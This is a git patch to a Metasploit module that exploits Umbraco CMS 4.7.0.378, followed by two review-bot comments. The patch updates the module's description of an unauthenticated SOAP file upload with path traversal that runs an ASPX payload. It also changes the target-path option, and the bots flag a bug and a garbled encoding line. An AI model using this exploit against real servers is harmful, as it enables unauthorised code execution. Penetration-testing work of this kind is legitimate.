From 9fecc80459112d1ed2e67119cdd9e8d314250ebc Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 6 Jul 2012 15:47:25 +0200
Subject: [PATCH] User of TARGETURI plus improve of description

---
 .../windows/http/umbraco_upload_aspx.rb | 29 ++++++++++++-------
 1 file changed, 18 insertions(+), 11 deletions(-)

diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb
index cb0555dd18..7bda41c520 100644
--- a/modules/exploits/windows/http/umbraco_upload_aspx.rb
+++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb
@@ -17,24 +17,29 @@ class Metasploit3 < Msf::Exploit::Remote
     super(
       'Name' => 'Umbraco CMS Remote Command Execution',
       'Description' => %q{
-          This module can be used to execute a payload on Umbraco CMS
-          4.7.0.378. The payload is uploaded as an ASPX script by
-          sending a specially crafted SOAP request to codeEditorSave.asmx,
-          which permits unauthorised file upload via the SaveDLRScript operation.
-          SaveDLRScript is also subject to a path traversal vulnerability,
-          allowing code to be placed into the web-accessible /umbraco/ directory.
+          This module can be used to execute a payload on Umbraco CMS 4.7.0.378.
+          The payload is uploaded as an ASPX script by sending a specially crafted
+          SOAP request to codeEditorSave.asmx, which permits unauthorised file upload
+          via the SaveDLRScript operation. SaveDLRScript is also subject to a path
+          traversal vulnerability, allowing code to be placed into the web-accessible
+          /umbraco/ directory.
           The module writes, executes and then overwrites an ASPX script; note that
-          though the script content is removed, the file remains on the target.
+          though the script content is removed, the file remains on the target. Automatic
+          cleanup of the file is intended if a meterpreter payload is used.
+
+          This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows
+          7 32-bit SP1. In this scenario, the "IIS APPPOOL\ASP.NET v4.0" user must have
+          write permissions on the Windows Temp folder.
       },
       'Author' =>
         [
           'Toby Clarke' # Vulnerability discovery and Metasploit module
         ],
-      'Version' => '$Revision: $',
       'Platform' => 'win',
       'References' =>
         [
-          [ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ]
+          [ 'URL', 'http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html' ],
+          [ 'URL', 'http://umbraco.codeplex.com/workitem/18192' ] # Item deleted for security reasons
         ],
       'Targets' =>
         [
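Review bot: The new description sentence `Automatic cleanup of the file is intended if a meterpreter payload is used.` directly follows `the file remains on the target`, so a reader cannot tell which of the two actually happens for a given payload. State the behaviour the module implements, for example `The module removes the file itself only when a meterpreter payload is used; with other payloads the emptied file remains on the target.`, provided that is what the cleanup code (not visible in this hunk) does. The added reference carries the comment `# Item deleted for security reasons`, which tells the reader the URL resolves to nothing; a few words on what the work item was (the vendor's tracker entry for this issue, if that is the case) would keep the reference useful. The `super(...)` info block continues outside the hunk.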
@@ -47,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
-        OptString.new('PATH', [ true, "The URI path of the Umbraco login page", '/umbraco'])
+        OptString.new('TARGETURI', [true, 'The URI path of the Umbraco login page', '/umbraco/'])
       ], self.class)
   end
@@ -94,7 +99,9 @@ class Metasploit3 < Msf::Exploit::Remote
     # htmlentities like encoding
     aspx = aspx.gsub("&", "&").gsub("\"", """).gsub("'", "'").gsub("<", "<").gsub(">", ">")
-    uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")
+    uri_path = target_uri.path
+    uri_path.path << "/" if uri_path[-1, 1] != "/"
+
     @upload_random = rand_text_alpha(rand(6) + 6)
     soap = <<-eos
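Review bot: In the second hunk on this line, `uri_path.path << "/" if uri_path[-1, 1] != "/"` calls `.path` on a String: `target_uri.path` already returns the path string (as the HttpClient `target_uri` helper does, as far as I can tell), so whenever TARGETURI is set without a trailing slash the guard is true and the line raises NoMethodError; the default `/umbraco/` only masks this. Using `<<` would also mutate the string handed back by `target_uri` rather than build a local copy. The replacement is two lines: `uri_path = target_uri.path` / `uri_path += "/" unless uri_path.end_with?("/")`, which also handles an empty path (`""[-1, 1]` is nil, so the original comparison was true by accident rather than by design). The `aspx = aspx.gsub(...)` context line looks as though its HTML entity replacements were decoded by whatever rendered this patch, so check it against the repository before reading it as a defect. The enclosing method starts and ends outside the hunk.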